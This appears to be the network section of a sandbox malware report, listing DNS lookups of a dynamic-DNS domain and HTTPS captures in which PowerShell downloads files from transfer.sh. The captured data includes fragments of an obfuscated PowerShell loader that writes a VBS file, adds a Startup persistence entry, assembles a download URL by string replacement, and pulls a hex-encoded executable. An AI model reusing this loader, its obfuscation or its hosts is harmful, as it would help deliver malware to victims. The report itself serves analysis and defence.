                            Sep 14, 2021 21:32:18.006880999 CEST5062053192.168.2.38.8.8.8
                            Sep 14, 2021 21:32:18.034837008 CEST53506208.8.8.8192.168.2.3
                            Sep 14, 2021 21:32:19.147222042 CEST6493853192.168.2.38.8.8.8
                            Sep 14, 2021 21:32:19.195584059 CEST53649388.8.8.8192.168.2.3
                            Sep 14, 2021 21:32:25.942838907 CEST6015253192.168.2.38.8.8.8
                            Sep 14, 2021 21:32:25.981408119 CEST53601528.8.8.8192.168.2.3
                            Sep 14, 2021 21:32:50.426218987 CEST5754453192.168.2.38.8.8.8
                            Sep 14, 2021 21:32:50.469855070 CEST53575448.8.8.8192.168.2.3
                            Sep 14, 2021 21:32:53.884622097 CEST5598453192.168.2.38.8.8.8
                            Sep 14, 2021 21:32:53.953444958 CEST53559848.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:04.513500929 CEST6418553192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:04.556632996 CEST53641858.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:14.995866060 CEST6511053192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:15.032250881 CEST53651108.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:39.066502094 CEST5836153192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:39.205550909 CEST53583618.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:44.937664032 CEST6349253192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:44.986776114 CEST53634928.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:46.667778015 CEST6083153192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:46.723493099 CEST53608318.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:48.093101025 CEST6010053192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:48.215358973 CEST53601008.8.8.8192.168.2.3
                            Sep 14, 2021 21:33:55.512907028 CEST5319553192.168.2.38.8.8.8
                            Sep 14, 2021 21:33:55.641356945 CEST53531958.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:02.123956919 CEST5014153192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:02.150721073 CEST53501418.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:08.548230886 CEST5302353192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:08.578613997 CEST53530238.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:15.318332911 CEST4956353192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:15.443417072 CEST53495638.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:22.421416998 CEST5135253192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:22.547233105 CEST53513528.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:29.452146053 CEST5934953192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:29.479391098 CEST53593498.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:37.624314070 CEST5708453192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:37.747653008 CEST53570848.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:38.997507095 CEST5882353192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:39.035672903 CEST53588238.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:42.600891113 CEST5756853192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:42.630556107 CEST53575688.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:43.259749889 CEST5054053192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:43.321432114 CEST53505408.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:43.707896948 CEST5436653192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:43.796641111 CEST53543668.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:44.350318909 CEST5303453192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:44.430267096 CEST53530348.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:44.958034992 CEST5776253192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:44.989054918 CEST53577628.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:45.196273088 CEST5543553192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:45.277555943 CEST53554358.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:45.878691912 CEST5071353192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:45.905601978 CEST53507138.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:46.859489918 CEST5613253192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:46.888839006 CEST53561328.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:47.891957998 CEST5898753192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:47.924279928 CEST53589878.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:48.400331974 CEST5657953192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:48.427774906 CEST53565798.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:51.504686117 CEST6063353192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:51.533015966 CEST53606338.8.8.8192.168.2.3
                            Sep 14, 2021 21:34:58.911084890 CEST6129253192.168.2.38.8.8.8
                            Sep 14, 2021 21:34:59.036608934 CEST53612928.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:07.566674948 CEST6361953192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:07.691066027 CEST53636198.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:14.716074944 CEST6493853192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:14.744461060 CEST53649388.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:21.678634882 CEST6194653192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:21.802058935 CEST53619468.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:28.534904003 CEST6491053192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:28.562736034 CEST53649108.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:34.650243998 CEST5212353192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:34.679805994 CEST53521238.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:41.573893070 CEST5613053192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:41.599319935 CEST53561308.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:47.607172012 CEST5633853192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:47.633822918 CEST53563388.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:54.708528042 CEST5942053192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:54.734992981 CEST53594208.8.8.8192.168.2.3
                            Sep 14, 2021 21:35:59.751655102 CEST5878453192.168.2.38.8.8.8
                            Sep 14, 2021 21:35:59.875005960 CEST53587848.8.8.8192.168.2.3

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Sep 14, 2021 21:32:18.006880999 CEST192.168.2.38.8.8.80x94efStandard query (0)transfer.shA (IP address)IN (0x0001)
                            Sep 14, 2021 21:32:53.884622097 CEST192.168.2.38.8.8.80xce92Standard query (0)transfer.shA (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:39.066502094 CEST192.168.2.38.8.8.80xb6c2Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:48.093101025 CEST192.168.2.38.8.8.80x397cStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:55.512907028 CEST192.168.2.38.8.8.80x6eb5Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:02.123956919 CEST192.168.2.38.8.8.80x8773Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:08.548230886 CEST192.168.2.38.8.8.80x5758Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:15.318332911 CEST192.168.2.38.8.8.80x72d9Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:22.421416998 CEST192.168.2.38.8.8.80x27cStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:29.452146053 CEST192.168.2.38.8.8.80x5dd8Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:37.624314070 CEST192.168.2.38.8.8.80x4809Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:44.958034992 CEST192.168.2.38.8.8.80x75baStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:51.504686117 CEST192.168.2.38.8.8.80x5803Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:58.911084890 CEST192.168.2.38.8.8.80xd4e7Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:07.566674948 CEST192.168.2.38.8.8.80xaa04Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:14.716074944 CEST192.168.2.38.8.8.80x9022Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:21.678634882 CEST192.168.2.38.8.8.80x7ed4Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:28.534904003 CEST192.168.2.38.8.8.80x7392Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:34.650243998 CEST192.168.2.38.8.8.80xeb15Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:41.573893070 CEST192.168.2.38.8.8.80xb737Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:47.607172012 CEST192.168.2.38.8.8.80xe06cStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:54.708528042 CEST192.168.2.38.8.8.80xc228Standard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:59.751655102 CEST192.168.2.38.8.8.80x464cStandard query (0)newjan.duckdns.orgA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Sep 14, 2021 21:32:18.034837008 CEST8.8.8.8192.168.2.30x94efNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                            Sep 14, 2021 21:32:53.953444958 CEST8.8.8.8192.168.2.30xce92No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:39.205550909 CEST8.8.8.8192.168.2.30xb6c2No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:48.215358973 CEST8.8.8.8192.168.2.30x397cNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:33:55.641356945 CEST8.8.8.8192.168.2.30x6eb5No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:02.150721073 CEST8.8.8.8192.168.2.30x8773No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:08.578613997 CEST8.8.8.8192.168.2.30x5758No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:15.443417072 CEST8.8.8.8192.168.2.30x72d9No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:22.547233105 CEST8.8.8.8192.168.2.30x27cNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:29.479391098 CEST8.8.8.8192.168.2.30x5dd8No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:37.747653008 CEST8.8.8.8192.168.2.30x4809No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:44.989054918 CEST8.8.8.8192.168.2.30x75baNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:51.533015966 CEST8.8.8.8192.168.2.30x5803No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:34:59.036608934 CEST8.8.8.8192.168.2.30xd4e7No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:07.691066027 CEST8.8.8.8192.168.2.30xaa04No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:14.744461060 CEST8.8.8.8192.168.2.30x9022No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:21.802058935 CEST8.8.8.8192.168.2.30x7ed4No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:28.562736034 CEST8.8.8.8192.168.2.30x7392No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:34.679805994 CEST8.8.8.8192.168.2.30xeb15No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:41.599319935 CEST8.8.8.8192.168.2.30xb737No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:47.633822918 CEST8.8.8.8192.168.2.30xe06cNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:54.734992981 CEST8.8.8.8192.168.2.30xc228No error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)
                            Sep 14, 2021 21:35:59.875005960 CEST8.8.8.8192.168.2.30x464cNo error (0)newjan.duckdns.org194.147.140.20A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • transfer.sh

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.349739144.76.136.153443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            2021-09-14 19:32:18 UTC0OUTGET /ucAlHz/FGTEFR.txt HTTP/1.1
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2021-09-14 19:32:18 UTC0INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename="FGTEFR.txt"
                            Content-Length: 10843
                            Content-Type: text/plain; charset=utf-8
                            Retry-After: Tue, 14 Sep 2021 21:32:23 GMT
                            Server: Transfer.sh HTTP Server 1.0
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 84.17.52.51
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1631647943
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Date: Tue, 14 Sep 2021 19:32:18 GMT
                            Connection: close
                            2021-09-14 19:32:18 UTC0INData Raw: 24 61 61 20 3d 20 22 32 34 3a 2d 3a 34 36 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 33 61 3a 2d 3a 35 63 3a 2d 3a 35 35 3a 2d 3a 37 33 3a 2d 3a 35 34 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 35 3a 2d 3a 34 33 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 34 3a 2d 3a 34 33 3a 2d 3a 35 32 3a
                            Data Ascii: $aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:
                            2021-09-14 19:32:18 UTC1INData Raw: 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 37 32 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 36 66 3a 2d 3a 37 32 3a 2d 3a 37 39 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 3a 2d 3a 37 30 3a 2d 3a 36 63 3a 2d 3a 36 31 3a 2d 3a 36 33 3a 2d 3a 36 35 3a 2d 3a 32 38 3a 2d 3a 32 32 3a
                            Data Ascii: -:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:
                            2021-09-14 19:32:18 UTC3INData Raw: 34 32 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 37 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 36 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 33 38 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 36 32 3a 2d 3a 36 63 3a 2d 3a 36 39 3a 2d 3a 36 33 3a 2d 3a 35 63 3a 2d 3a 35 32 3a 2d 3a 37 35 3a 2d 3a 36 65 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a
                            Data Ascii: 42:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:
                            2021-09-14 19:32:18 UTC4INData Raw: 2d 3a 37 34 3a 2d 3a 36 38 3a 2d 3a 32 30 3a 2d 3a 32 34 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 61 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 34 38 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 34 65 3a 2d 3a 36 31 3a 2d 3a 36 64 3a 2d 3a 36 35 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 35 33 3a 2d 3a 37 34 3a 2d 3a 36 31 3a 2d 3a 37 32 3a 2d 3a 37 34 3a 2d 3a 37 35 3a 2d 3a 37 30 3a 2d 3a 32 32 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 35 36 3a 2d 3a 36 31 3a 2d 3a 36 63 3a 2d 3a 37 35 3a 2d 3a 36 35 3a
                            Data Ascii: -:74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:
                            2021-09-14 19:32:18 UTC8INData Raw: 0a 53 65 74 20 48 20 3d 20 4e 6f 74 68 69 6e 67 0d 0a 27 40 0d 0a 53 65 74 2d 43 6f 6e 74 65 6e 74 20 2d 50 61 74 68 20 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 52 75 6e 5c 4e 65 77 2e 76 62 73 20 2d 56 61 6c 75 65 20 24 43 6f 6e 74 65 6e 74 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 24 53 5a 58 44 43 46 56 47 42 48 4e 4a 53 44 46 47 48 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 48 2d 48 73 68 2f 4b 35 6b 37 78 6a 2f 48 53 4a 44 55 49 46 48 2d 48 74 78 74 27 2e 52 65 70 6c 61 63 65 28 27 48 2d 48 27 2c 27 2e 27 29 3b 0d 0a 24 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 20 3d 20 22 32 34 3a 2d 3a 34 35 3a 2d 3a 34 34 3a 2d 3a 35 32 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 34 38 3a 2d 3a 34 65 3a
                            Data Ascii: Set H = Nothing'@Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Contentstart-sleep -s 7$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/K5k7xj/HSJDUIFH-Htxt'.Replace('H-H','.');$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.349761144.76.136.153443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            2021-09-14 19:32:54 UTC11OUTGET /K5k7xj/HSJDUIF.txt HTTP/1.1
                            Host: transfer.sh
                            2021-09-14 19:32:54 UTC11INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename="HSJDUIF.txt"
                            Content-Length: 512724
                            Content-Type: text/plain; charset=utf-8
                            Retry-After: Tue, 14 Sep 2021 21:32:59 GMT
                            Server: Transfer.sh HTTP Server 1.0
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 84.17.52.51
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1631647979
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Date: Tue, 14 Sep 2021 19:32:54 GMT
                            Connection: close
                            2021-09-14 19:32:54 UTC11INData Raw: 5b 53 74 72 69 6e 67 5d 24 48 48 3d 27 34 44 35 41 39 2d 2d 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 46 46 46 46 2d 2d 2d 2d 42 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 45 31 46 42 41 2d 45 2d 2d 42 34 2d 39 43 44 32 31 42 38 2d 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 2d 37 2d 37 32 36 46 36 37 37 32 36 31 36 44 32 2d 36 33 36 31 36 45 36 45 36 46 37 34 32 2d 36 32 36 35 32 2d 37 32 37 35 36 45 32 2d 36 39 36 45 32 2d 34 34 34 46 35 33 32 2d 36 44 36 46 36 34 36 35 32 45 2d 44 2d 44 2d 41 32 34
                            Data Ascii: [String]$HH='4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24
                            2021-09-14 19:32:54 UTC12INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 32 2d 2d 2d 2d 2d 34 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 45 37 34 36 35 37 38 37 34 2d 2d 2d 2d 2d 2d 39 38 43 37 2d 31 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 43 38 2d 31 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 36 2d 32 45 37 32 36 35 36 43 36 46 36 33 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 43 41 2d 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                            Data Ascii: -------------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------98C7-1----2-------C8-1-----2----------------------------2-----6-2E72656C6F63-----C-----------2-----2------CA-1------------
                            2021-09-14 19:32:54 UTC14INData Raw: 31 2d 32 31 45 31 45 32 44 31 32 32 36 2d 33 31 42 31 36 32 43 2d 46 32 36 32 38 35 32 2d 2d 2d 2d 2d 41 32 38 35 33 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 45 46 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 31 31 2d 32 31 38 31 37 32 44 2d 37 32 36 32 38 35 34 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 31 33 33 2d 2d 31 2d 2d 2d 42 2d 2d 2d 2d 2d 2d 2d 44 2d 2d 2d 2d 31 31 44 2d 2d 35 2d 2d 2d 2d 2d 32 32 38 34 36 2d 2d 2d 2d 2d 41 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 45 2d 2d 2d 2d 31 31 2d 32 31 42 31 39 32 44 2d 37 32 36 32 38 35 35 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 2d 33 33 2d 2d 41 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 41 31 37
                            Data Ascii: 1-21E1E2D1226-31B162C-F262852-----A2853-----A2A262BEC262BEF------133--3---F-------C----11-218172D-7262854-----A2A262BF7--133--1---B-------D----11D--5-----22846-----A2A--133--3---F-------E----11-21B192D-7262855-----A2A262BF7---33--A---F---------------21A17
